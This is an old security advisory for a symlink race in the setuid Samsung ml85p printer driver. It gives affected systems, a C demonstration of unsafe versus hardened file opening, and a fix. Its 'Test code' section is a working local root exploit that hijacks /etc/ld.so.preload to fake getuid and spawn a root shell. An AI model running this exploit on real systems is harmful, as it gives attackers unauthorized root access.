
Samsung ml85p Printer Utility Symbolic Link Vulnerability


Published: 2001-07-18
Updated: 2001-07-18
Severity:
Threat level: local administrator privileges
Error type: race condition
Exploitation method: server mode

Affected systems
Samsung ml85p Printer Driver 1.0
   + Samsung Samsung ML-85G Printer 1.0
      - RedHat Powertools 6.2
         - RedHat Linux 6.2 sparc
         - RedHat Linux 6.2 i386
         - RedHat Linux 6.2 alpha
      - Netscape Communicator 4.77
         - S.u.S.E. Linux 7.0
         - RedHat Linux 6.2 sparc
         - RedHat Linux 6.2 i386
         - RedHat Linux 6.2 alpha
         - RedHat Linux 6.1 sparc
         - RedHat Linux 6.1 i386
         - RedHat Linux 6.1 alpha
         - RedHat Linux 6.0 sparc
         - RedHat Linux 6.0 i386
         - RedHat Linux 6.0 alpha
         - RedHat Linux 5.2 sparc
         - RedHat Linux 5.2 i386
         - RedHat Linux 5.2 alpha
         - Microsoft Windows 98
         - Microsoft Windows 95
         - Microsoft Windows NT 4.0SP6a
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0SP6
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0SP5
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0SP4
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0SP3
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0SP2
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0SP1
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0
         - Microsoft Windows 2000 SP2
         - Microsoft Windows 2000 SP1
         - Microsoft Windows 2000
         - MandrakeSoft Linux Mandrake 7.1
         - MandrakeSoft Linux Mandrake 7.0
         - MandrakeSoft Linux Mandrake 6.1
         - MandrakeSoft Linux Mandrake 6.0
         - Conectiva Linux 5.1
         - Conectiva Linux 5.0
         - Conectiva Linux 4.2
         - Conectiva Linux 4.1
         - Conectiva Linux 4.0
         - Conectiva Linux 3.0
         - Caldera eServer 2.3
         - Caldera eDesktop 2.4
         - Caldera OpenLinux eBuilder 3.0
         - Caldera OpenLinux Desktop 2.3
      - Netscape Communicator 4.76
         - S.u.S.E. Linux 7.0
         - RedHat Linux 6.2 sparc
         - RedHat Linux 6.2 i386
         - RedHat Linux 6.2 alpha
         - RedHat Linux 6.1 sparc
         - RedHat Linux 6.1 i386
         - RedHat Linux 6.1 alpha
         - RedHat Linux 6.0 sparc
         - RedHat Linux 6.0 i386
         - RedHat Linux 6.0 alpha
         - RedHat Linux 5.2 sparc
         - RedHat Linux 5.2 i386
         - RedHat Linux 5.2 alpha
         - Microsoft Windows 98
         - Microsoft Windows 95
         - Microsoft Windows NT 4.0SP6a
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0SP6
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0SP5
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0SP4
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0SP3
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0SP2
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0SP1
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0
         - Microsoft Windows 2000 SP2
         - Microsoft Windows 2000 SP1
         - Microsoft Windows 2000
         - MandrakeSoft Linux Mandrake 7.1
         - MandrakeSoft Linux Mandrake 7.0
         - MandrakeSoft Linux Mandrake 6.1
         - MandrakeSoft Linux Mandrake 6.0
         - Conectiva Linux 5.1
         - Conectiva Linux 5.0
         - Conectiva Linux 4.2
         - Conectiva Linux 4.1
         - Conectiva Linux 4.0
         - Conectiva Linux 3.0
         - Caldera eServer 2.3
         - Caldera eDesktop 2.4
         - Caldera OpenLinux 2.3
         - Caldera OpenLinux eBuilder 3.0
      - Netscape Communicator 4.75
         - S.u.S.E. Linux 7.0
         - RedHat Linux 6.2 sparc
         - RedHat Linux 6.2 i386
         - RedHat Linux 6.2 alpha
         - RedHat Linux 6.1 sparc
         - RedHat Linux 6.1 i386
         - RedHat Linux 6.1 alpha
         - RedHat Linux 6.0 sparc
         - RedHat Linux 6.0 i386
         - RedHat Linux 6.0 alpha
         - RedHat Linux 5.2 sparc
         - RedHat Linux 5.2 i386
         - RedHat Linux 5.2 alpha
         - Microsoft Windows 98
         - Microsoft Windows 95
         - Microsoft Windows NT 4.0SP6a
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0SP6
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0SP5
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0SP4
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0SP3
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0SP2
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0SP1
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0
         - Microsoft Windows 2000 SP2
         - Microsoft Windows 2000 SP1
         - Microsoft Windows 2000
         - MandrakeSoft Linux Mandrake 7.1
         - MandrakeSoft Linux Mandrake 7.0
         - MandrakeSoft Linux Mandrake 6.1
         - MandrakeSoft Linux Mandrake 6.0
         - Conectiva Linux 5.1
         - Conectiva Linux 5.0
         - Conectiva Linux 4.2
         - Conectiva Linux 4.1
         - Conectiva Linux 4.0
         - Conectiva Linux 3.0
         - Caldera eServer 2.3
         - Caldera eDesktop 2.4
         - Caldera OpenLinux eBuilder 3.0
         - Caldera OpenLinux Desktop 2.3
      - Netscape Communicator 4.74
         - S.u.S.E. Linux 7.0
         - RedHat Linux 6.2 sparc
         - RedHat Linux 6.2 i386
         - RedHat Linux 6.2 alpha
         - RedHat Linux 6.1 sparc
         - RedHat Linux 6.1 i386
         - RedHat Linux 6.1 alpha
         - RedHat Linux 6.0 sparc
         - RedHat Linux 6.0 i386
         - RedHat Linux 6.0 alpha
         - RedHat Linux 5.2 sparc
         - RedHat Linux 5.2 i386
         - RedHat Linux 5.2 alpha
         - Microsoft Windows 98se
         - Microsoft Windows 98
         - Microsoft Windows 95
         - Microsoft Windows NT 4.0SP6a
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0SP6
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0SP5
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0SP4
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0SP3
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0SP2
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0SP1
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0
         - Microsoft Windows 2000 SP2
         - Microsoft Windows 2000 SP1
         - Microsoft Windows 2000
         - MandrakeSoft Linux Mandrake 7.1
         - MandrakeSoft Linux Mandrake 7.0
         - MandrakeSoft Linux Mandrake 6.1
         - MandrakeSoft Linux Mandrake 6.0
         - Conectiva Linux 5.1
         - Conectiva Linux 5.0
         - Conectiva Linux 4.2
         - Conectiva Linux 4.1
         - Conectiva Linux 4.0
         - Conectiva Linux 3.0
         - Caldera eServer 2.3
         - Caldera eDesktop 2.4
         - Caldera OpenLinux eBuilder 3.0
         - Caldera OpenLinux Desktop 2.3
      - Netscape Communicator 4.73
         - S.u.S.E. Linux 7.0
         - RedHat Linux 6.2 sparc
         - RedHat Linux 6.2 i386
         - RedHat Linux 6.2 alpha
         - RedHat Linux 6.1 sparc
         - RedHat Linux 6.1 i386
         - RedHat Linux 6.1 alpha
         - RedHat Linux 6.0 sparc
         - RedHat Linux 6.0 i386
         - RedHat Linux 6.0 alpha
         - RedHat Linux 5.2 sparc
         - RedHat Linux 5.2 i386
         - RedHat Linux 5.2 alpha
         - Microsoft Windows 98se
         - Microsoft Windows 98
         - Microsoft Windows 95
         - Microsoft Windows NT 4.0SP6a
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0SP6
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0SP5
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0SP4
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0SP3
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0SP2
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0SP1
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0
         - Microsoft Windows 2000 SP2
         - Microsoft Windows 2000 SP1
         - Microsoft Windows 2000
         - MandrakeSoft Linux Mandrake 7.1
         - MandrakeSoft Linux Mandrake 7.0
         - MandrakeSoft Linux Mandrake 6.1
         - MandrakeSoft Linux Mandrake 6.0
         - Conectiva Linux 5.1
         - Conectiva Linux 5.0
         - Conectiva Linux 4.2
         - Conectiva Linux 4.1
         - Conectiva Linux 4.0es
         - Conectiva Linux 4.0
         - Caldera eServer 2.3
         - Caldera eDesktop 2.4
         - Caldera OpenLinux eBuilder 3.0
         - Caldera OpenLinux Desktop 2.3
      - Netscape Communicator 4.72
         - S.u.S.E. Linux 7.0
         - RedHat Linux 6.2 sparc
         - RedHat Linux 6.2 i386
         - RedHat Linux 6.2 alpha
         - RedHat Linux 6.1 sparc
         - RedHat Linux 6.1 i386
         - RedHat Linux 6.1 alpha
         - RedHat Linux 6.0 sparc
         - RedHat Linux 6.0 i386
         - RedHat Linux 6.0 alpha
         - RedHat Linux 5.2 sparc
         - RedHat Linux 5.2 i386
         - RedHat Linux 5.2 alpha
         - Microsoft Windows 98
         - Microsoft Windows 95
         - Microsoft Windows NT 4.0SP6a
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0SP6
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0SP5
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0SP4
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0SP3
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0SP2
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0SP1
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0
         - Microsoft Windows 2000 SP2
         - Microsoft Windows 2000 SP1
         - Microsoft Windows 2000
         - MandrakeSoft Linux Mandrake 7.1
         - MandrakeSoft Linux Mandrake 7.0
         - MandrakeSoft Linux Mandrake 6.1
         - MandrakeSoft Linux Mandrake 6.0
         - Conectiva Linux 5.1
         - Conectiva Linux 5.0
         - Conectiva Linux 4.2
         - Conectiva Linux 4.1
         - Conectiva Linux 4.0es
         - Conectiva Linux 4.0
         - Caldera eServer 2.3
         - Caldera eDesktop 2.4
         - Caldera OpenLinux eBuilder 3.0
         - Caldera OpenLinux Desktop 2.3
      - Netscape Communicator 4.7
         - S.u.S.E. Linux 7.0
         - RedHat Linux 6.2 sparc
         - RedHat Linux 6.2 i386
         - RedHat Linux 6.2 alpha
         - RedHat Linux 6.1 sparc
         - RedHat Linux 6.1 i386
         - RedHat Linux 6.1 alpha
         - RedHat Linux 6.0 sparc
         - RedHat Linux 6.0 i386
         - RedHat Linux 6.0 alpha
         - RedHat Linux 5.2 sparc
         - RedHat Linux 5.2 i386
         - RedHat Linux 5.2 alpha
         - Microsoft Windows 98
         - Microsoft Windows 95
         - Microsoft Windows NT 4.0SP6a
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0SP6
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0SP5
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0SP4
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0SP3
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0SP2
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0SP1
            + Microsoft Windows NT 4.0
         - Microsoft Windows NT 4.0
         - Microsoft Windows 2000 SP2
         - Microsoft Windows 2000 SP1
         - Microsoft Windows 2000
         - Conectiva Linux 5.1
         - Conectiva Linux 5.0
         - Conectiva Linux 4.2
         - Conectiva Linux 4.1
         - Caldera eServer 2.3
         - Caldera eDesktop 2.4
         - Caldera OpenLinux eBuilder 3.0
         - Caldera OpenLinux Desktop 2.3
   + Ghostscript Ghostscript 5.50
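Detailed description
ml85p is the driver for the Samsung ML-85G series of printers. When it
creates its image output file it does not check for symbolic links and
creates a file with a guessable name in the /tmp directory, which allows
a local user to carry out a symbolic link attack and escalate privileges.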
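
The missing check described above, as an added example (not ml85p's source, which this page does not include): an opener that follows whatever sits at a predictable name, next to one that refuses it. The function names and the scratch-directory self-check are hypothetical, and the output file name is a constructed value in the `ml85g` plus epoch-seconds form used by the test code on this page.

```c
/* Added example: illustrates the flaw class, not ml85p's actual source. */
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Pattern the advisory describes: predictable name, symlinks followed. */
int open_output_unsafe(const char *path) {
    return open(path, O_WRONLY | O_CREAT | O_TRUNC, 0666);
}

/* Hardened: O_EXCL fails if the name already exists (a dangling symlink
 * counts); fstat then confirms a regular, singly linked file we own. */
int open_output_safe(const char *path) {
    struct stat st;
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) ||
        st.st_nlink != 1 || st.st_uid != geteuid()) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Plant a dangling symlink at the output name in a private scratch dir and
 * run the opener: 1 = link followed, 0 = refused, -1 = setup error. */
int link_followed(int (*opener)(const char *)) {
    char dir[] = "/tmp/symdemoXXXXXX", target[64], out[64];
    if (!mkdtemp(dir)) return -1;
    snprintf(target, sizeof target, "%s/protected", dir);
    snprintf(out, sizeof out, "%s/ml85g995414400", dir); /* constructed name */
    if (symlink(target, out) != 0) { rmdir(dir); return -1; }
    int fd = opener(out);
    if (fd >= 0) close(fd);
    int followed = (access(target, F_OK) == 0);
    unlink(target); unlink(out); rmdir(dir);
    return followed;
}

int main(void) {
    printf("unsafe opener followed planted link: %d\n", link_followed(open_output_unsafe));
    printf("safe opener followed planted link:   %d\n", link_followed(open_output_safe));
    return 0;
}
```

A setuid program that must write scratch output is better served by mkstemp() in a directory only it can write to, which removes the predictable name as well as the followed link.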

Test code
#!/bin/sh
# Exploit using /usr/bin/ml85p default setuid program on
# Mandrake Linux 8.0
#
# You need to be in the sys group to be able to execute
# ml85p.

echo "** ml85p exploit"
# set the required umask
umask 0

# get the number of seconds since 1970
DATE=`date +"%s"`
if [ ! -u /usr/bin/ml85p ] || [ ! -x /usr/bin/ml85p ]
then
    echo "** this exploit requires that /usr/bin/ml85p is setuid and executable."
    exit 1
fi

if [ ! -e /etc/ld.so.preload ] || [ ! -w /etc/ld.so.preload ]
then
    echo "** this exploit requires that /etc/ld.so.preload does not exist."
    exit 1
fi

echo "** creating file"
ln -s /etc/ld.so.preload /tmp/ml85g"$DATE"
echo "bleh" | /usr/bin/ml85p -s
rm /tmp/ml85g"$DATE"

echo "** creating shared library"
cat << _EOF_ > /tmp/g.c
int getuid(void) { return(0); }
_EOF_

echo "** compiling and linking shared object"
gcc -c -o /tmp/g.o /tmp/g.c
ld -shared -o /tmp/g.so /tmp/g.o
rm -f /tmp/g.c /tmp/g.o

echo "** rigging ld.so.preload"
echo "/tmp/g.so" > /etc/ld.so.preload
echo "** execute su. warning all getuid() calls will return(0) until you remove"
echo "** the line \"/tmp/g.so\" from /etc/ld.so.preload. removing /tmp/g.so without"
echo "** first fixing /etc/ld.so.preload may result in system malfunction"
su -
echo "** cleaning up"
> /etc/ld.so.preload
rm -f /tmp/g.so

Solution
Remove the setuid bit from ml85p.

Related information